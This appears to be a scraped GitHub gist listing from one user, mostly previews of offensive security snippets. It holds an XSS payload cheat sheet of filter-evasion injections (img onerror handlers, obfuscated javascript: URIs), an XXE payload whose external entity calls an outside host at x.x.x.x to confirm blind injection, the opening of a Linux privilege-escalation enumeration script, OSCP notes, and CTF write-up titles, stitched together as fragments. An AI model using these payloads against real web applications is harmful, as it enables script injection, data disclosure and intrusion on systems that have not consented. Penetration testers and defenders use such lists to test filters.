@fb11
fb11 / xsspayload.txt
Last active October 15, 2022 00:59
XSS Payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
><img id=XSS SRC=x onerror=alert(XSS);>
;!--"<XSS>=&{()}"
<IMG id=XSS SRC="javascript:alert('XSS');">
<IMG id=XSS SRC=javascript:alert('XSS')>
<IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
<IMG id=XSS SRC=javascript:alert("XSS")>
<IMG id=XSS SRC=`javascript:alert("'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG id=XSS SRC="jav ascript:alert('XSS');">
@fb11
fb11 / gist:951549ebcd3cc545d580efb2bae3094c
Last active August 25, 2017 11:05
“>><<img src=x onerror=alert(1);//>>
“>><<img src=x onerror=alert(1);//>>
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>

Credit: @brutelogic (blog)

Summary

The XSS payloads and schemes used in all posts for a quick reference.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!
@fb11
fb11 / Deneme
Last active October 26, 2017 05:47
code
Remote code execution successful
@fb11
fb11 / XXE_payloads
Created November 6, 2017 11:49 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@fb11
fb11 / enum.sh
Created February 26, 2018 16:06 — forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@fb11
fb11 / CTFWRITE-Blocky-HTB.md
Created March 3, 2018 22:52 — forked from berzerk0/CTFWRITE-Blocky-HTB.md
CTF Writeup: Blocky on HackTheBox
@fb11
fb11 / CTFWRITE-Europa-HTB.md
Created March 3, 2018 22:53 — forked from berzerk0/CTFWRITE-Europa-HTB.md
CTF Writeup: Europa on HackTheBox